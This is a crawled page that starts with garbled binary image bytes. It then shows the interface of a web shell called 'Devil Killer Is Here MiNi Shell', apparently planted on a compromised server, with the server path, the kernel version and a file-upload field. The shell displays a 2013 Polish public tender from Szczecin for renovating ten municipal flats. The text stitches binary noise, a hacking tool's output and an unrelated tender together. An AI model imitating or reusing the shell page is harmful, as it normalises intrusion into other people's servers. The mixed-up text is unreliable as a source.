JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130520/195128-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu dziesięciu komunalnych lokali mieszkalnych w Szczecinie, w podziale na trzy części</b><br>
<b>Numer ogłoszenia: 195128 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dziesięciu komunalnych lokali mieszkalnych w Szczecinie, w podziale na trzy części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu dziesięciu komunalnych lokali mieszkalnych, w podziale na trzy części:
1)	Część I zamówienia - ul. Nad Odrą 30/12, ul. Nad Odrą 32/4, ul. Robotnicza 11of/17, ul. 5 Lipca 42a/4;
2)	Część II zamówienia - ul. Dubois 15/6, ul. Liściasta 11/2, ul. Parkowa 26/15
3)	Część III zamówienia - ul. Słowackiego 11/27, ul. Słowackiego 15/19, al. Powstańców Wielkopolskich 38/6.

2.	Zakres remontu poszczególnych lokali mieszkalnych:
1)	nr 12 w budynku przy ul. Nad Odrą 30 (powierzchnia użytkowa lokalu - 34,19 m2): 
a)	w branży budowlanej - malowanie podłóg, wymiana wykładziny PCV, wymiana stolarki drzwiowej i okiennej, naprawa dwóch pieców kaflowych, malowanie ścian wraz z robotami towarzyszącymi, wywóz gruzu
b)	w branży sanitarnej - instalacja wod-kan., demontaż urządzeń sanitarnych, montaż wodomierza i zaworu czerpalnego, montaż syfonu i zlewozmywaka,   
c)	w branży elektrycznej - częściowa naprawa instalacji, pomiar rezystancji izolacji instalacji elektr., 

2)	nr 4 w budynku przy ul. Nad Odrą 32 (powierzchnia użytkowa lokalu - 32,11 m2): 
a)	w branży budowlanej - roboty malarskie, skasowanie zacieków, wymiana wykładziny PCV, montaż drzwi harmonijkowych, naprawa dwóch pieców kaflowych wraz z robotami towarzyszącymi, wywóz gruzu
b)	w branży sanitarnej - próba instalacji gazowej, demontaż urządzeń sanitarnych, montaż zlewozmywaka i syfonu, montaż wodomierza,
c)	w branży elektrycznej - naprawa instalacji i osprzętu, pomiar rezystancji izolacji instalacji elektr., 

3)	nr 17 w budynku przy ul. Robotniczej 11of (powierzchnia lokalu - 37,46 m2):
a)	w branży budowlanej - odgrzybienie spoin na ścianach, naprawa stolarki drzwiowej, montaż nawietrzników ciśnieniowych i czujnika czadu wymiana posadzki z PCV, uzupełnienie tynków, naprawa pieców kaflowych - 2 szt,  malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż wodomierza, demontaż urządzeń sanitarnych, przeczyszczenie rurociągu kanalizacyjnego, montaż zlewozmywaka i syfonu, wymiana kuchenki gazowej, próba gazowa,
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana przewodów kabelkowych, wymiana puszki, gniazda, pomiar rezystancji izolacji instalacji elektr., 

4)	nr 4 w budynku przy ul. 5 Lipca 42a (powierzchnia użytkowa lokalu - 49,42 m2): 
a)	w branży budowlanej - malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - naprawa i remont urządzeń sanitarnych, montaż wodomierza, próba instalacji gazowej, 
c)	w branży elektrycznej - roboty demontażowe, podłączenie przewodów, montaż puszek, przewodów, montaż sygnalizatorów akustycznych, pomiar rezystancji izolacji instalacji elektr., 

5)	nr 6 w budynku przy ul. Dubois 15 (powierzchnia użytkowa lokalu 47,65 m2): 
a)	w branży budowlanej - wykonanie przesklepień, wymiana skrzydeł drzwiowych, wymiana posadzki z PCV, montaż czujek pożarowych malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - wymiana zlewozmywaka, baterii umywalkowej, kuchni gazowej, 
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana osprzętu, pomiar rezystancji instalacji elektr.,

6)	nr 2 w budynku przy ul. Liściastej 11 (powierzchnia użytkowa lokalu - 46,17 m2):
a)	w branży budowlanej - przecieranie tynków, wymiana stolarki drzwiowej, malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - próba instalacji gazowej, sprawdzenie kuchni gazowej czteropalnikowej, montaż wodomierza, 
c)	w branży elektrycznej - demontaż osprzętu, montaż przewodów, montaż osprzętu, wymiana tablicy licznikowej, pomiar rezystancji instalacji elektr.,

7)	nr 15 w budynku przy ul. Parkowej 26 (powierzchnia użytkowa lokalu - 42,11m2):
a)	w branży budowlanej - przecieranie tynków, przestawienie pieców- 2 szt., montaż czujników tlenku węgla malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka, próba instalacji gazowej, montaż wodomierza, wymiana kuchni gazowej,
c)	w branży elektrycznej - wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.

8)	nr 27 w budynku przy ul. Słowackiego 11 (powierzchnia użytkowa lokalu - 39,66m2):
a)	w branży budowlanej -  dopasowanie skrzydeł drzwiowych, montaż detektora tlenku węgla, malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka i syfonu, montaż kuchni gazowej, wodomierza, próba instalacji gazowej, 
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.

9)	nr 19 w budynku przy ul. Słowackiego 15 (powierzchnia użytkowa lokalu - 31,46m2):
a)	w branży budowlanej - wymiana stolarki okiennej, wymiana posadzki PCV, montaż detektora tlenku węgla, naprawa pieców kaflowych - 2 szt., malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka, syfonu, wymiana kuchni gazowej, montaż wodomierza, próba gazowa,,
c)	w branży elektrycznej - wymiana przewodów i osprzętu, pomiar rezystancji instalacji elektr.

10)	nr 6 w budynku przy ul. Powstańców Wielkopolskich 38 (powierzchnia użytkowa lokalu - 39,23m2):
a)	w branży budowlanej - dopasowanie skrzydeł drzwiowych i okiennych, malowanie wraz z robotami towarzyszącymi, wymiana wykładziny z tworzyw sztucznych, naprawa pieca, wywóz gruzu,
b)	w branży sanitarnej - montaż detektora tlenku węgla, próba instalacji gazowej, wymiana zlewozmywaka i baterii,
c)	w branży elektrycznej - wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.

3. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia. Wykonawca wypełnia wskazaną pozycję (część na którą składa ofertę) na druku oferty cenowej (załącznik 1) zgodnie z wymaganiami siwz, w pozostałych pozycjach wpisuje nie dotyczy.
UWAGA!  Złożenie oferty na trzy części, spowoduje jej odrzucenie w trybie art. 89 
ust. 1 pkt 2 ustawy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości: 
1)	dla Części I zamówienia (ul. Nad Odrą 30/12, ul. Nad Odrą 32/4, ul. Robotnicza 11of/17, ul. 5 Lipca 42a/4) - 387,00 zł (słownie: trzysta osiemdziesiąt siedem złotych),
2)	dla Części II zamówienia (ul. Dubois 15/6, ul. Liściasta 11/2, ul. Parkowa 26/15) - 635,00 zł (słownie: sześćset trzydzieści pięć złotych),
3)	dla Części III zamówienia (ul. Słowackiego 11/27, ul. Słowackiego 15/19, 
al. Powstańców Wielkopolskich 38/6) - 612,00 zł (słownie: sześćset dwanaście złotych),
     w terminie do dnia 05.06.2013 r. do godz. 10.00. Decyduje data wpływu środków do   zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto ZBiLK w ING Bank Śląski O/Szczecin nr 73 1050 0099 6803 0000 0000 0001
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy 
ul. Mariackiej 25, w pokój nr  10  przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie remontu jednego lokalu mieszkalnego we wszystkich branżach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.

UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2010 Nr 243 poz. 1623, ze zmianami) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdego lokalu mieszkalnego, sporządzone zgodnie z zasadami określonymi w Rozdziale X siwz.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)	terminu wykonania zamówienia w przypadku wystąpienia nieprzewidzianych robót, których realizacja jest niezbędna do prawidłowego wykonania przedmiotu umowy i będzie miała istotny wpływ na przedłużenie terminu zakończenia robót,
2)	zmianę osób przewidzianych do realizacji umowy, w szczególnych przypadkach losowych, których wystąpienie uniemożliwi realizację umowy przez te osoby</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70-546 Szczecin
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2013 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70-546 Szczecin
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia:
1) w przypadku składania oferty na jedną część zamówienia - 60 dni kalendarzowych, 
2) w przypadku składania oferty na dwie części zamówienia - 90 dni kalendarzowych
liczonych od dnia protokolarnego przekazania placu budowy.
2. Wymagany przez zamawiającego minimalny okres rękojmi i gwarancji jakości - 12 miesięcy, od dnia odbioru końcowego robót.
3. Zamawiający przewiduje płatność wynagrodzenia jednorazowo, po wykonaniu i protokolarnym odbiorze robót, w terminie 21 dni od dnia dostarczenia faktury do siedziby zamawiającego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ul. Nad Odrą 30/12, ul. Nad Odrą 32/4, ul. Robotnicza 11of/17, ul. 5 Lipca 42a/4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	nr 12 w budynku przy ul. Nad Odrą 30 (powierzchnia użytkowa lokalu - 34,19 m2): 
a)	w branży budowlanej - malowanie podłóg, wymiana wykładziny PCV, wymiana stolarki drzwiowej i okiennej, naprawa dwóch pieców kaflowych, malowanie ścian wraz z robotami towarzyszącymi, wywóz gruzu
b)	w branży sanitarnej - instalacja wod-kan., demontaż urządzeń sanitarnych, montaż wodomierza i zaworu czerpalnego, montaż syfonu i zlewozmywaka,   
c)	w branży elektrycznej - częściowa naprawa instalacji, pomiar rezystancji izolacji instalacji elektr., 

2.	nr 4 w budynku przy ul. Nad Odrą 32 (powierzchnia użytkowa lokalu - 32,11 m2): 
a)	w branży budowlanej - roboty malarskie, skasowanie zacieków, wymiana wykładziny PCV, montaż drzwi harmonijkowych, naprawa dwóch pieców kaflowych wraz z robotami towarzyszącymi, wywóz gruzu
b)	w branży sanitarnej - próba instalacji gazowej, demontaż urządzeń sanitarnych, montaż zlewozmywaka i syfonu, montaż wodomierza,
c)	w branży elektrycznej - naprawa instalacji i osprzętu, pomiar rezystancji izolacji instalacji elektr., 

3.	nr 17 w budynku przy ul. Robotniczej 11of (powierzchnia lokalu - 37,46 m2):
a)	w branży budowlanej - odgrzybienie spoin na ścianach, naprawa stolarki drzwiowej, montaż nawietrzników ciśnieniowych i czujnika czadu wymiana posadzki z PCV, uzupełnienie tynków, naprawa pieców kaflowych - 2 szt,  malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż wodomierza, demontaż urządzeń sanitarnych, przeczyszczenie rurociągu kanalizacyjnego, montaż zlewozmywaka i syfonu, wymiana kuchenki gazowej, próba gazowa,
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana przewodów kabelkowych, wymiana puszki, gniazda, pomiar rezystancji izolacji instalacji elektr., 

4.	nr 4 w budynku przy ul. 5 Lipca 42a (powierzchnia użytkowa lokalu - 49,42 m2): 
a)	w branży budowlanej - malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - naprawa i remont urządzeń sanitarnych, montaż wodomierza, próba instalacji gazowej, 
c)	w branży elektrycznej - roboty demontażowe, podłączenie przewodów, montaż puszek, przewodów, montaż sygnalizatorów akustycznych, pomiar rezystancji izolacji instalacji elektr.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ul. Dubois 15/6, ul. Liściasta 11/2, ul. Parkowa 26/15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	nr 6 w budynku przy ul. Dubois 15 (powierzchnia użytkowa lokalu 47,65 m2): 
a)	w branży budowlanej - wykonanie przesklepień, wymiana skrzydeł drzwiowych, wymiana posadzki z PCV, montaż czujek pożarowych malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
